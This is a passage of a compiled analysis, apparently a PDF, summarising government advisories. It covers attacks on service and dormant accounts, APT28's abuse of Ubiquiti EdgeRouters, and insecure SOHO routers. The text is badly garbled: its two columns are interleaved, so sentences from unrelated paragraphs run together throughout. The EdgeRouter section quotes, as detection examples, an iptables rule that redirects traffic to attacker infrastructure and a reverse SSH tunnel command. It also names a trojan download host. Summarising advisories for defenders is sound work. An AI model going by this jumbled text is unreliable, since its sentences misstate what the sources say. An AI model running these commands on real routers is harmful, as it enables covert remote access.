Dormant accounts, on the other hand, are user accounts that are
entities manage critical infrastructure, citizen services,
and have access to vast amounts of personal data, which no longer actively used, either because the user has left the
can be exploited for various malicious purposes. organization or the account's purpose has been fulfilled. These
accounts are particularly risky because they are frequently
• Government Financial Departments: These forgotten, left with more privileges than necessary, and not
departments handle sensitive economic data and have monitored as closely as active user accounts.
insights into national financial strategies and policies,
which can be valuable for foreign intelligence services. 3) Why Service and Dormant Accounts Are Targeted
• Elevated Privileges: Service accounts often have
• Military Organizations: Military targets are of high elevated privileges necessary for system tasks, which
interest due to their strategic importance and access to can be exploited to gain wide access to an organization's
classified information on defense capabilities, network.
operations, and technologies.

39
 Read more: Boosty | Sponsr | TG

• Lack of Monitoring: Dormant accounts are not 2) Technical Prowess and Innovation
regularly used, making them less likely to be monitored Cyber operations are characterized by the use of custom
for suspicious activity, and thus an attractive target for malware and zero-day vulnerabilities—previously unknown
attackers. software vulnerabilities that haven't been disclosed to the
• Weak or Default Credentials: Service accounts may software maker or the public. The exploitation of these
be configured with weak or default credentials that are vulnerabilities allows them to infiltrate target networks
easier for attackers to guess or find through brute force undetected. An example of this is the SolarWinds supply chain
attacks. attack, where is believed to have compromised the software
development process to insert malicious code into a software
• Bypassing User Behavior Analytics: Since service update, affecting thousands of SolarWinds' clients, including
accounts perform automated tasks, their behavior government agencies and Fortune 500 companies.
patterns can be predictable, allowing malicious activities
to blend in with normal operations and evade detection. 3) Operational Security and Stealth
Operational security (OpSec) is a hallmark of operations,
4) The Threat Posed by Compromised Accounts
with the agency going to great lengths to cover its tracks and
• Move Laterally: Use the account's privileges to move maintain stealth within compromised networks. This includes
laterally within the network, accessing other systems
the use of encrypted channels for exfiltrating data, the careful
and data.
management of command-and-control servers to avoid
• Escalate Privileges: Leverage the account to escalate detection, and the use of legitimate tools and services (a
privileges and gain administrative access to critical technique known as "living off the land") to blend in with normal
systems. network activity. The ability to maintain a low profile within
target networks often allows them to conduct long-term
• Maintain Persistence: Establish a persistent presence
within the network, making it more difficult to detect espionage operations without detection.
and remove the attacker. 4) Psychological and Social Engineering Tactics
• Exfiltrate Data: Access and exfiltrate sensitive data, Beyond technical capabilities, it has shown adeptness in
leading to data breaches and intellectual property theft. psychological and social engineering tactics. These methods are
designed to manipulate individuals into divulging sensitive
5) Mitigating the Risks Associated with Service and Dormant information or performing actions that compromise security.
Accounts Phishing campaigns, spear-phishing, and other forms of social
• Regular Audits: Conduct regular audits of all accounts engineering are frequently used to gain initial access to target
to identify and deactivate dormant accounts and ensure networks or to escalate privileges once inside.
that service accounts have the minimum necessary
privileges. 5) Target Selection and Intelligence Gathering
The target selection process is strategic and aligned with
• Strong Authentication Controls: Enforce strong Russia's national interests. Targets are carefully chosen based on
password policies and use multi-factor authentication their potential to provide valuable intelligence, whether it be
(MFA) for service accounts where possible. political, economic, technological, or military. Once a target is
• Monitoring and Alerting: Implement monitoring and compromised, the actors focus on long-term access and
alerting mechanisms to detect unusual activities intelligence gathering, prioritizing stealth and persistence over
associated with service and dormant accounts. immediate gains. This approach allows them to collect a
comprehensive picture of the target's activities, relationships,
• Segregation of Duties: Apply the principle of and plans.
segregation of duties to service accounts to limit the
scope of access and reduce the risk of misuse. 6) Adaptability to the Cybersecurity Landscape
One of the most defining aspects is its adaptability. The shift
• Automated Management Tools: Utilize automated
account management tools to keep track of account towards targeting cloud services and exploiting service and
usage and lifecycle, ensuring that accounts are dormant accounts is a testament to this adaptability. By
deactivated when no longer needed. continuously refining their methods and exploring new vectors
of attack, the actors remain a persistent and evolving threat in
I. Sophistication of cyber actors the cyber domain.
1) The Sophistication of Cyber Operations J. Defense through Cybersecurity Fundamentals
The actors has demonstrated a high level of sophistication in
its cyber operations, reflecting a deep understanding of the 1) Defense through Cybersecurity Fundamentals in the APT
global cyber landscape and an ability to adapt and innovate in In the contemporary cybersecurity landscape, marked by the
the face of evolving security measures. This sophistication is not sophisticated operations of actors, the importance of adhering to
only evident in the technical capabilities but also in their cybersecurity fundamentals cannot be overstated. While
strategic approach to cyber espionage, which involves careful advanced threats continue to evolve, leveraging cutting-edge
target selection, meticulous planning, and the use of advanced tactics, techniques, and procedures (TTPs), a strong foundation
tactics, techniques, and procedures (TTPs). in cybersecurity fundamentals remains a critical line of defense
for organizations across all sectors. This foundational approach

40
 Read more: Boosty | Sponsr | TG

to cybersecurity emphasizes the implementation of best 5) Strategies for Strengthening Fundamental Defenses
practices, policies, and controls that are designed to protect • Continuous Risk Assessment: Regularly assessing the
against a wide range of threats, including those from highly organization's security posture to identify vulnerabilities
sophisticated adversaries. and prioritize remediation efforts.
2) Understanding Cybersecurity Fundamentals • Leveraging Security Frameworks: Adopting
• Access Control: Ensuring that only authorized users comprehensive security frameworks, such as the NIST
have access to information systems and data, and that Cybersecurity Framework, to guide the implementation
they are only able to perform actions that are necessary of best practices and controls.
for their role.
• Automating Security Processes: Utilizing automation
• Data Encryption: Protecting data at rest and in transit to streamline security processes, such as patch
through encryption, making it unreadable to management and monitoring, to enhance efficiency and
unauthorized users. effectiveness.
• Patch Management: Regularly updating software and • Fostering a Culture of Security: Building a strong
systems to address vulnerabilities and reduce the risk of security culture within the organization, where
exploitation. cybersecurity is viewed as a shared responsibility
among all employees.
• Firewalls and Intrusion Detection Systems (IDS):
Implementing firewalls to block unauthorized access • Collaboration and Information Sharing: Engaging in
and IDS to monitor network traffic for suspicious collaboration and information sharing with industry
activity. peers and government agencies to stay informed about
emerging threats and best practices.
• Multi-Factor Authentication (MFA): Requiring users
to provide two or more verification factors to gain access K. Mitigations to Strengthen Defense
to systems, significantly enhancing security. 1) Mitigations to Strengthen Defense Against APT
• Security Awareness Training: Educating employees In the context of heightened cyber threats from sophisticated
about cybersecurity risks and best practices to prevent actors, organizations must employ a comprehensive set of
social engineering attacks and other threats. mitigations to strengthen their defenses. These mitigations are
designed to address vulnerabilities across various aspects of an
• Incident Response Planning: Preparing for potential organization's infrastructure and operations, thereby reducing
security incidents with a well-defined plan for response the risk of successful cyber-attacks. Implementing these
and recovery. mitigations requires a strategic approach that encompasses both
3) The Role of Fundamentals in Defending Against technical solutions and organizational processes.
Sophisticated Threats 2) Key Mitigation Strategies
While sophisticated cyber actors like the actors employ • Implement Multi-Factor Authentication (MFA):
advanced techniques to bypass security measures, many of their MFA is one of the most effective controls for securing
strategies still exploit basic security weaknesses—such as poor user accounts against compromise. By requiring
password management, unpatched software, and insufficient multiple forms of verification, MFA makes it
access controls. By adhering to cybersecurity fundamentals, significantly more difficult for attackers to gain
organizations can address these vulnerabilities, making it unauthorized access, even if they have obtained a user's
significantly more difficult for attackers to gain initial access or credentials.
move laterally within a network.
• Regular Patching and Updates: Keeping software and
For example, the implementation of MFA can prevent systems up to date with the latest patches is crucial for
unauthorized access even if credentials are compromised. closing security gaps that could be exploited by
Regular patch management can close off vulnerabilities before attackers. A regular patch management process should
they can be exploited in a zero-day attack. Security awareness be established to ensure timely application of updates.
training can reduce the risk of employees falling victim to • Network Segmentation: Dividing the network into
phishing or other social engineering tactics. smaller, controlled segments can limit an attacker's
4) Challenges in Maintaining Cybersecurity Fundamentals ability to move laterally within the network and access
Despite the clear benefits, maintaining a strong foundation sensitive areas. Segmentation also helps contain
potential breaches to a smaller subset of the network.
in cybersecurity fundamentals can be challenging for
organizations. This can be due to a variety of factors, including • Endpoint Protection: Deploying advanced endpoint
resource constraints, the complexity of modern IT protection solutions can help detect and prevent
environments, and the rapid pace of technological change. malicious activities on devices that access the
Additionally, as organizations increasingly adopt cloud services organization's network. This includes the use of
and other advanced technologies, the cybersecurity landscape antivirus software, host-based intrusion prevention
becomes more complex, requiring continuous adaptation of systems, and endpoint detection and response (EDR)
fundamental security practices. tools.

41
 Read more: Boosty | Sponsr | TG

• Security Awareness Training: Educating employees • Detailed TTPs: It provides detailed information on the
about cybersecurity risks and best practices is essential tactics, techniques, and procedures (TTPs) used by
for preventing social engineering attacks, such as actors, including the use of service and dormant
phishing. Regular training can help create a culture of accounts, which can help organizations identify
security awareness within the organization. potential threats and vulnerabilities.
• Least Privilege Access Control: Ensuring that users • Sector-Specific Insights: The document outlines the
have only the access rights necessary for their role helps expansion of targeting to sectors such as aviation,
minimize the potential impact of account compromise. education, law enforcement, and military organizations,
Access controls should be regularly reviewed and offering sector-specific insights that can help these
adjusted as necessary. industries bolster their defenses.
• IR Planning: Having a well-defined and tested incident • Mitigation Strategies: It offers practical mitigation
response plan enables organizations to respond quickly strategies that organizations can implement to
and effectively to security incidents, minimizing strengthen their defenses against initial access by actors,
damage and restoring operations as soon as possible. such as implementing MFA and managing system
accounts.
• Continuous Monitoring and Detection: Implementing
continuous monitoring and detection capabilities can • Emphasis on Fundamentals: The advisory emphasizes
help identify suspicious activities early on. This includes the importance of cybersecurity fundamentals, which
the use of security information and event management can help organizations establish a strong baseline
(SIEM) systems, intrusion detection systems (IDS), and defense against sophisticated actors.
network traffic analysis.
• Global Supply Chain Relevance: The document
• Secure Configuration and Hardening: Systems references the actors’ involvement in the SolarWinds
should be securely configured and hardened against supply chain compromise, highlighting the global
attacks. This involves disabling unnecessary services, implications of such cyber espionage activities.
applying secure configuration settings, and ensuring that
security features are enabled. 2) Drawbacks:
• Resource Intensity: Implementing the recommended
• Backup and Recovery: Regular backups of critical data mitigations may require significant resources, which
and systems, along with robust recovery procedures, are could be challenging for smaller organizations with
essential for resilience against ransomware and other limited cybersecurity budgets and personnel.
destructive attacks. Backups should be tested regularly
to ensure they can be relied upon in an emergency. • Complexity of Cloud Security: The document points
out the inherent challenges in securing cloud
3) Challenges in Implementing Mitigations infrastructure, which may require specialized
While these mitigations are effective in theory, organizations knowledge and skills that not all organizations possess.
often face challenges in their implementation. These challenges
can include limited resources, the complexity of IT • Evolving Tactics: While the document provides current
TTPs, the actors’ tactics are constantly evolving, which
environments, the need for specialized skills, and the difficulty
means that defenses based solely on this advisory may
of balancing security with business requirements. Additionally, quickly become outdated.
the rapidly evolving nature of cyber threats means that
mitigation strategies must be continually reassessed and • Potential for Overemphasis on Specific Threats:
updated. Focusing too much on such actors could lead
organizations to neglect other threat actors or vectors
4) Collaborative Efforts and Information Sharing that are equally dangerous but not covered in the
To overcome these challenges and enhance the effectiveness document.
of mitigations, organizations can engage in collaborative efforts
and information sharing with industry partners, government • Shared Responsibility Model: The document implies a
agencies, and cybersecurity communities. This collaboration can shared responsibility model for cloud security, which
provide access to shared knowledge, threat intelligence, and best may lead to confusion about the division of security
responsibilities between cloud providers and customers.
practices that can inform and improve an organization's
mitigation efforts. • False Sense of Security: Organizations might develop
a false sense of security by relying on the mitigations
L. Benefits and drawbacks of NSA’s advisory suggested, without considering the need for a dynamic
1) Benefits: and adaptive security posture to respond to new threats.
• Awareness and Understanding: The document raises
awareness about the shift in tactics towards cloud
services, which is crucial for organizations to
understand the current threat landscape.

42
 Read more: Boosty | Sponsr | TG

NSA'S PANIC.
UBIQUITI

43
 Read more: Boosty | Sponsr | TG

compromised routers, the actors had unfettered access to the

Linux-based operating systems to install tooling and obfuscate
their identity.
APT28 also deployed custom Python scripts on the
compromised routers to collect and validate stolen webmail
account credentials obtained through cross-site scripting and
browser-in-the-browser spear-phishing campaigns.
Additionally, they exploited a critical zero-day elevation-of-
privilege vulnerability in Microsoft Outlook (CVE-2023-23397)
to collect NTLMv2 digests from targeted Outlook accounts and
used publicly available tools to assist with NTLM relay attacks
B. Keypoints and takeaways
• APT28 (also known as Fancy Bear, Forest Blizzard, and
Strontium) have been exploiting compromised Ubiquiti
EdgeRouters to conduct malicious cyber ops globally.
• The exploitation includes harvesting credentials,
collecting NTLMv2 digests, proxying network traffic,
and hosting spear-phishing landing pages and custom
tools.
• The FBI, NSA, US Cyber Command, and international
Abstract – This document provides a comprehensive analysis of the partners have issued a joint Cybersecurity Advisory
joint Cybersecurity Advisory (CSA) released by the Federal Bureau (CSA) detailing the threat and providing mitigation
of Investigation (FBI), National Security Agency (NSA), US Cyber recommendations.
Command, and international partners, detailing the exploitation of
compromised Ubiquiti EdgeRouters by APT28 to facilitate malicious • The advisory includes observed tactics, techniques, and
cyber operations globally. The analysis delves into various aspects of procedures (TTPs), indicators of compromise (IOCs),
the advisory, including the tactics, techniques, and procedures and maps the threat actors' activity to the MITRE
(TTPs) employed by the threat actors, indicators of compromise ATT&CK framework.
(IOCs), and recommended mitigation strategies for network
defenders and EdgeRouter users. • The advisory urges immediate action to mitigate the
threat, including performing hardware factory resets,
This qualitative summary of the CSA provides valuable insights for
cybersecurity professionals, network defenders, and specialists updating firmware, changing default credentials, and
across various sectors, offering a deeper understanding of the nature implementing strategic firewall rules.
of state-sponsored cyber threats and practical guidance on • APT28 has used compromised EdgeRouters since at
enhancing network security against sophisticated adversaries. The
analysis is particularly useful for those involved in securing critical least 2022 to facilitate covert operations against various
infrastructure, as it highlights the evolving tactics of cyber threat industries and countries, including the US.
actors and underscores the importance of international
• The EdgeRouters are popular due to their user-friendly
collaboration in cybersecurity efforts.
Linux-based operating system but are often shipped with
A. Introduction default credentials and limited firewall protections.
The document titled “Cyber Actors Use Compromised • The advisory provides detailed TTPs and IOCs to help
Routers to Facilitate Cyber Operations” released by the Federal network defenders identify and mitigate the threat.
Bureau of Investigation (FBI), National Security Agency
(NSA), US Cyber Command, and international partners warns • The advisory also includes information on how to map
of use of compromised Ubiquiti EdgeRouters to facilitate malicious cyber activity to the MITRE ATT&CK
malicious cyber operations worldwide. framework.
The popularity of Ubiquiti EdgeRouters is attributed to their • Organizations using Ubiquiti EdgeRouters must take
user-friendly, Linux-based operating system, default credentials, immediate action to secure their devices against APT28
and limited firewall protections. The routers are often shipped exploitation.
with insecure default configurations and do not automatically
update firmware unless configured by the user. • The recommended actions include resetting hardware to
factory settings, updating to the latest firmware,
The compromised EdgeRouters have been used by APT28 changing default usernames and passwords, and
to harvest credentials, collect NTLMv2 digests, proxy network implementing strategic firewall rules.
traffic, and host spear-phishing landing pages and custom tools.
APT28 accessed the routers using default credentials and • Network defenders should be aware of the TTPs and
trojanized OpenSSH server processes. With root access to the IOCs provided in the advisory to detect and respond to
potential compromises.

44
 Read more: Boosty | Sponsr | TG

C. Threat Actor Activity The use of a Mirai-based botnet like Moobot highlights the
Their operations have targeted various industries, including importance of securing IoT devices, such as routers, by changing
Aerospace & Defense, Education, Energy & Utilities, default passwords and keeping the firmware up to date. The
Governments, Hospitality, Manufacturing, Oil & Gas, Retail, combination of weak or default passwords and unpatched
Technology, and Transportation. The targeted countries include vulnerabilities makes these devices an attractive target for threat
the Czech Republic, Italy, Lithuania, Jordan, Montenegro, actors like APT28.
Poland, Slovakia, Turkey, Ukraine, United Arab Emirates, and 3) Impact on Compromised EdgeRouters
the US, with a strategic focus on individuals in Ukraine. With the trojanized OpenSSH server processes in place,
Potential consequences and impacts on these affected APT28 actors can maintain persistent access to the compromised
industries include: EdgeRouters. This allows them to use the routers as a platform
for various malicious activities, such as:
• Data breaches and theft of sensitive information,
intellectual property, or trade secrets. • Harvesting credentials

• Disruption of critical infrastructure operations, such as • Collecting NTLMv2 digests

power grids, transportation systems, or manufacturing • Proxying network traffic
processes.
• Hosting spear-phishing landing pages and custom tools
• Compromise of government networks and systems,
potentially leading to espionage or national security E. Credential Access via Python Scripts
threats. APT28 actors have been hosting custom Python scripts on
• Financial losses due to operational disruptions, theft of compromised Ubiquiti EdgeRouters to collect and validate
customer data, or reputational damage. stolen webmail account credentials. These scripts are typically
stored alongside related log files in the home directory of a
• Potential safety risks if control systems or operational compromised user, such as:
technology (OT) networks are compromised.
• /home/<compromised user>/srv/core.py
• Loss of customer trust and confidence in the affected
organizations. • /home/<compromised user>/srv/debug.txt

D. Moobot OpenSSH Trojan The FBI claims that they have recovered verbose log files
containing information about APT28 activity on the
APT28 actors have been leveraging default credentials and compromised EdgeRouters.
trojanized OpenSSH server processes to access Ubiquiti
EdgeRouters. The trojanized OpenSSH server processes are 1) Custom Python Scripts
associated with Moobot, a Mirai-based botnet that infects The custom Python scripts hosted on the compromised
Internet of Things (IoT) devices using remotely exploitable EdgeRouters serve the purpose of collecting and validating
vulnerabilities, such as weak or default passwords. stolen webmail account credentials. APT28 actors use these
scripts as part of their credential harvesting operations, targeting
1) Trojanized OpenSSH Server Binaries specific webmail users.
Trojanized OpenSSH server binaries downloaded from
packinstall[.]kozow[.]com have replaced legitimate binaries on The scripts are designed to automatically break captcha
EdgeRouters accessed by APT28. These trojanized binaries problems on webmail login pages, allowing the actors to bypass
allow remote attackers to bypass authentication and gain this security measure and gain unauthorized access to the
unauthorized access to the compromised routers. targeted accounts. To achieve this, the scripts make connections
to the API endpoint api[.]anti-captcha[.]com, which is used by
The Moobot botnet is known for its ability to exploit APT28 actors for captcha-solving purposes.
vulnerabilities in IoT devices, particularly those with weak or
default passwords. By replacing the legitimate OpenSSH server 2) Yara Rule for Detection
binaries with trojanized versions, APT28 actors can maintain To help network defenders locate credential collection
persistent access to the compromised EdgeRouters and use them scripts on compromised EdgeRouters, the FBI has created a
for various malicious purposes. Yara rule. Yara is a tool used to identify and classify malware
based on textual or binary patterns. The FBI-provided Yara rule
2) Mirai-based Botnet can be used to scan the file system of EdgeRouters and detect
Moobot is a Mirai-based botnet, which means it is derived the presence of the custom Python scripts used by APT28 actors.
from the infamous Mirai malware that first emerged in 2016.
Mirai is designed to scan for and infect IoT devices by exploiting In addition to using the Yara rule, network defenders can
common vulnerabilities and using default credentials. Once a also query network traffic for connections to the api[.]anti-
device is infected, it becomes part of the botnet and can be used captcha[.]com endpoint. Detecting traffic to this API can help
for distributed denial-of-service (DDoS) attacks, credential identify compromised EdgeRouters and potential credential
stuffing, and other malicious activities. harvesting activities.
3) Mitigation and Investigation

45
 Read more: Boosty | Sponsr | TG

Upon detecting the presence of custom Python scripts or Outlook installations are updated with the latest security
connections to the api[.]anti-captcha[.]com endpoint, network updates.
defenders should take immediate action to mitigate the risk and
investigate the extent of the compromise: • Scan for compromised EdgeRouters: Use the provided
information to scan EdgeRouters for the presence of
• Isolating the affected EdgeRouters from the network ntlmrelayx.py, Responder, and their associated log files.
Identify and isolate any compromised routers for further
• Performing a thorough analysis of the scripts and log files investigation.
to understand the scope of the credential harvesting
activities • Reset compromised credentials: If NTLMv2 credential
leaks are detected, reset the affected user accounts and
• Resetting passwords for potentially compromised implement additional security measures, such as multi-
webmail accounts factor authentication.
F. Exploitation of CVE-2023-23397 • Implement recommended mitigations: Follow the
APT28 actors have been exploiting CVE-2023-23397, a recommended mitigations for compromised
critical elevation of privilege vulnerability in Microsoft Outlook EdgeRouters, including performing a hardware factory
on Windows, to facilitate NTLMv2 credential leaks. This reset, upgrading to the latest firmware version, and
vulnerability, which was a zero-day at the time of its initial changing default usernames and passwords.
exploitation by APT28 in early 2022, allows Net-NTLMv2
hashes to be leaked to actor-controlled infrastructure. G. Proxy and Tunnel Infrastructure
APT28 actors have been using compromised Ubiquiti
1) NTLMv2 Credential Harvesting EdgeRouters to establish proxy connections and reverse SSH
To exploit CVE-2023-23397 and harvest NTLMv2 tunnels to their dedicated infrastructure. This allows them to
credentials, APT28 actors have been using two publicly maintain persistent access and control over the compromised
available tools: devices, even after password changes or other mitigation
• ntlmrelayx.py: This tool is part of the Impacket suite, a attempts.
collection of Python classes for working with network 1) Reverse Proxy Connections
protocols. APT28 actors have used ntlmrelayx.py to APT28 actors have utilized iptables rules on EdgeRouters to
execute NTLM relay attacks [T1557] and facilitate the establish reverse proxy connections to their dedicated
leakage of NTLMv2 credentials. infrastructure. Network defenders and users can review iptables
• Responder: Responder is a tool designed to capture and chains and Bash histories on EdgeRouters for unusual
relay NTLMv2 hashes by setting up a rogue invocations, such as the following example:
authentication server [T1556]. APT28 actors have
installed Responder on compromised Ubiquiti iptables -t nat -I PREROUTING -d <router IP
EdgeRouters to collect NTLMv2 credentials from address> -p tcp -m tcp --dport 4443 -j DNAT -to-
targeted Outlook accounts. destination <APT28 dedicated infrastructure>:10081
The FBI has collected evidence of APT28's CVE-2023-
23397 exploitation activity on numerous compromised This iptables rule redirects incoming traffic on port 4443 of
EdgeRouters. the EdgeRouter to the APT28 dedicated infrastructure on port
10081, effectively creating a reverse proxy connection.
• Logging and Detection
2) Reverse SSH Tunnels
• When using the default configurations, Responder logs Additionally, APT28 actors have uploaded adversary
its activity to the following files: controlled SSH RSA keys to compromised EdgeRouters to
• Responder-Session.log establish reverse SSH tunnels. These tunnels allow the actors to
access the compromised devices, even after password changes
• Responder.db or other mitigation attempts.
Network defenders and users can search for these log files, Network defenders and users can review the following
as well as the presence of ntlmrelayx.py and Responder tooling, directories on EdgeRouters for unknown RSA keys:
on EdgeRouters to identify potential APT28 activity related to
the exploitation of CVE-2023-23397. • /root/.ssh/

2) Mitigation and Investigation • /home/<user>/.ssh/

To mitigate the risk of CVE-2023-23397 exploitation and The presence of unknown RSA keys in these directories may
NTLMv2 credential leaks, network defenders and users should indicate that adversaries have used them to access the
take the following steps: EdgeRouters, bypassing password authentication.
• Apply the Microsoft patch: Microsoft has released a Furthermore, network defenders can query network traffic
patch to address CVE-2023-23397. Ensure that all logs on EdgeRouters to identify abnormal SSH sessions. An

46
 Read more: Boosty | Sponsr | TG

invocation of a reverse SSH tunnel used by APT28 actors is connections to known APT28 infrastructure, including
provided below: compromised EdgeRouters.
• Analyze network logs: Review network logs for any
ssh –i <RSA key> -p <port> root@<router IP indications of encrypted communications or
address> -R <router IP address>:<port> connections to EdgeRouters that may be acting as C2
servers.
This command establishes a reverse SSH tunnel from the I. MITRE ATT&CK TACTICS AND TECHNIQUES
EdgeRouter to the APT28 infrastructure, allowing the actors to
maintain remote access and control over the compromised The provided tables map the tactics and techniques used by
device. the APT28 threat actor to the MITRE ATT&CK framework.
Here's a summary of the information:
H. MASEPIE Malware
1) Resource Development:
In December 2023, APT28 actors developed MASEPIE, a T1587 (Develop Capabilities): APT28 authored custom
small Python backdoor capable of executing arbitrary Python scripts to collect webmail account credentials.
commands on victim machines. An FBI investigation revealed
that on more than one occasion, APT28 used compromised T1588 (Obtain Capabilities): APT28 accessed
Ubiquiti EdgeRouters as command-and-control (C2) EdgeRouters compromised by the Moobot botnet, which installs
infrastructure for MASEPIE backdoors deployed against targets. OpenSSH trojans.
1) Command-and-Control Infrastructure 2) Initial Access:
While APT28 does not deploy MASEPIE on EdgeRouters T1584 (Compromise Infrastructure): APT28 accessed
themselves, the compromised routers have been used as C2 EdgeRouters previously compromised by an OpenSSH trojan.
infrastructure to communicate with and control MASEPIE
backdoors installed on systems belonging to targeted individuals T1566 (Phishing): APT28 conducted cross-site scripting and
and organizations. browser-in-the-browser spear-phishing campaigns.

The data sent to and from the EdgeRouters acting as C2 3) Execution:

servers was encrypted using a randomly generated 16-character T1203 (Exploitation for Client Execution): APT28
AES key, making it more difficult to detect and analyze the exploited the CVE-2023-23397 vulnerability.
malicious traffic. 4) Persistence:
2) MASEPIE Backdoor Functionality T1546 (Event Triggered Execution): The compromised
MASEPIE is a Python-based backdoor that allows APT28 routers housed Bash scripts and ELF binaries designed to
actors to execute arbitrary commands on the infected systems. backdoor OpenSSH daemons and related services.
This backdoor provides the threat actors with a persistent 5) Credential Access:
foothold and remote control capabilities, enabling them to carry T1557 (Adversary-in-the-Middle): APT28 installed tools
out various malicious activities, such as: like Impacket ntlmrelayx.py and Responder on compromised
• Data exfiltration routers to execute NTLM relay attacks.

• Lateral movement within the compromised network T1556 (Modify Authentication Process): APT28 hosted
NTLMv2 rogue authentication servers to modify the
• Deployment of additional malware or tools authentication process using stolen credentials from NTLM
relay attacks.
• Execution of reconnaissance and intelligence-gathering
commands 6) Collection:
T1119 (Automated Collection): APT28 utilized CVE-
3) Mitigation and Investigation 2023-23397 to automate the collection of NTLMv2 hashes.
To mitigate the risk of MASEPIE backdoors and the use of
compromised EdgeRouters as C2 infrastructure, network 7) Exfiltration:
defenders and users should take the following steps: T1020 (Automated Exfiltration): APT28 utilized CVE-
2023-23397 to automate the exfiltration of data to actor-
• Implement endpoint protection: Deploy advanced controlled infrastructure.
endpoint protection solutions capable of detecting and
preventing the execution of MASEPIE and other
malicious Python scripts or backdoors.
• Monitor network traffic: Closely monitor network
traffic for any suspicious encrypted communications or

47
 Read more: Boosty | Sponsr | TG

NSA’S PANIC.
SOHO

48
 Read more: Boosty | Sponsr | TG

known exploits for vulnerabilities that have long since

been made public.
• Insecure Default Settings: Many routers come with
easy-to-guess default passwords and use unencrypted
connections. This can be easily exploited by attackers.
• Lack of Secure Design and Development: SOHO
routers often lack basic security features due to insecure
design and development practices. This includes the
absence of automatic update capabilities and the presence
of exploitable defects, particularly in web management
interfaces.
• Exposure of Management Interfaces: Manufacturers
frequently create devices with management interfaces
exposed to the public internet by default, often without
notifying the customers of this frequently unsafe
configuration.
• Lack of Transparency and Accountability: There is a
need for manufacturers to embrace transparency by
disclosing product vulnerabilities through the CVE
program and accurately classifying these vulnerabilities
using the Common Weakness Enumeration (CWE)
system
Abstract – This document provides an in-depth analysis of the threats
posed by malicious cyber actors exploiting insecure Small • Neglect of Security in Favor of Convenience and
Office/Home Office (SOHO) routers. The analysis covers various Features: Manufacturers prioritize ease of use and a wide
aspects, including Security Defects and Exploits, Impact on Critical variety of features over security, leading to routers that
Infrastructure, Secure by Design Principles, Vulnerability and are "secure enough" right out of the box without
Exposure Research. considering the potential for exploitation.
The document offers a qualitative summary of the current state of • User Negligence: Many users, including IT
SOHO router security, highlighting the risks posed by insecure professionals, do not follow basic security practices such
devices and the steps that can be taken to mitigate these risks. The
analysis is beneficial for security professionals, manufacturers, and
as changing default passwords or updating firmware,
various industry sectors, providing a comprehensive understanding leaving routers exposed to attacks.
of the threats and guiding principles for enhancing the security of • Complexity in Identifying Vulnerable Devices:
SOHO routers. Identifying specific vulnerable devices is complex due to
A. Introduction legal and technical issues, complicating the process of
mitigating these vulnerabilities.
The exploitation of insecure SOHO routers by malicious
cyber actors, particularly state-sponsored groups, poses a C. Affected industries
significant threat to individual users and critical infrastructure. The exploitation of insecure SOHO routers poses a
Manufacturers are urged to adopt secure by design principles significant threat across multiple sectors, highlighting the need
and transparency practices to mitigate these risks, while users for improved security practices and awareness.
and network defenders are advised to implement best practices
for router security and remain vigilant against potential threats. 1) Communications
• Data Breaches and Eavesdropping: Insecure routers
B. Root of insecure soho routers can lead to unauthorized access to network traffic,
The root causes of insecure SOHO routers are multifaceted, allowing attackers to intercept sensitive communications.
involving both technical vulnerabilities and lapses in secure
• Disruption of Services: Compromised routers can be
design and development practices by manufacturers, as well as used to launch Distributed Denial of Service (DDoS)
negligence on the part of users in maintaining router security. attacks, disrupting communication services.
• Widespread Vulnerabilities: A significant number of 2) Transportation
vulnerabilities, totaling 226, have been identified in
Infrastructure Vulnerability: The transportation sector
popular SOHO router brands. These vulnerabilities range
in severity but collectively pose a substantial security relies heavily on networked systems for operations.
risk. Compromised routers could allow attackers to disrupt traffic
management systems and logistics operations.
• Outdated Components: Core components such as the
Linux kernel and additional services like VPN in these 3) Water
routers are outdated. This makes them susceptible to Operational Technology (OT) Threats: Insecure routers
can provide a gateway for attackers to target OT systems within

49
 Read more: Boosty | Sponsr | TG

the water sector, potentially affecting water treatment and NETGEAR SOHO routers, which are no longer
distribution systems. supported with security patches or software updates.
4) Energy • Concealment of Origin: By routing their malicious
Grid Security: The energy sector, particularly electric activities through SOHO routers, these actors can conceal
utilities, is at risk of targeted attacks through insecure routers. the PRC origin of their hacking activities, making it more
Attackers could gain access to control systems, posing a threat challenging to detect and attribute the attacks.
to the stability of the power grid. • Targeting Personal Emails: Volt Typhoon actors have
5) Other Industries been observed targeting the personal emails of key
network and IT staff to gain initial access to networks.
• Healthcare: Insecure routers can compromise patient
data and disrupt medical services by providing attackers • Use of Multi-Hop Proxies: For command and control
access to healthcare networks. (C2) infrastructure, the actors use multi-hop proxies
typically composed of virtual private servers (VPSs) or
• Retail and Hospitality: These sectors are vulnerable to SOHO routers.
data breaches involving customer information and
financial transactions due to insecure network devices. • Living Off the Land (LOTL) Techniques: Instead of
relying on malware for post-compromise execution, Volt
• Manufacturing: Industrial control systems can be Typhoon actors use hands-on-keyboard activity via
compromised through insecure routers, affecting command-line and other native tools and processes on
production lines and industrial processes. systems, a strategy known as LOTL, to maintain and
• Education: Schools and universities are at risk of data expand access to victim networks.
breaches and disruption of educational services. • Man-in-the-Middle Attacks: Attackers can exploit
• Government and Public Sector: Insecure routers can vulnerabilities in routers to intercept and manipulate data
lead to unauthorized access to government networks, passing through the network, leading to data breaches,
risking sensitive information and critical services identity theft, and espionage.
D. Key Findings on Malicious Cyber Actors Exploiting • Gateway to Further Exploitation: Once compromised,
Insecure SOHO Routers a router can serve as a gateway for attackers to launch
further attacks on connected devices, including
• Exploitation by State-Sponsored Groups: The computers, smartphones, and smart home devices.
People’s Republic of China (PRC)-sponsored Volt
Typhoon group is actively compromising SOHO routers • Botnet Recruitment: Insecure routers can be easily
by exploiting software defects. These compromised compromised and recruited into botnets, large networks
routers are then used as launching pads to further of infected devices used to launch distributed denial-of-
compromise U.S. critical infrastructure entities. service (DDoS) attacks, spam campaigns, and other
malicious activities.
• Impact on Critical Infrastructure: Compromised
SOHO routers pose a significant threat as they can be 2) Impact and Response
used to move laterally within networks and further • Public-Private Partnerships: The response to the Volt
compromise critical infrastructure sectors in the U.S., Typhoon compromises involved close collaboration
including communications, energy, transportation, and between government agencies, including the FBI and
water sectors. CISA, and private sector entities. This partnership
facilitated the sharing of threat intelligence, technical
• ZuoRAT Campaign: A sophisticated campaign indicators of compromise (IoCs), and best practices for
leveraging infected SOHO routers, dubbed ZuoRAT, has mitigation.
been identified. This campaign involves a multistage
remote access trojan (RAT) developed for SOHO • Firmware Analysis and Patching: Manufacturers of
devices, enabling attackers to maintain a low-detection affected SOHO routers were alerted to the
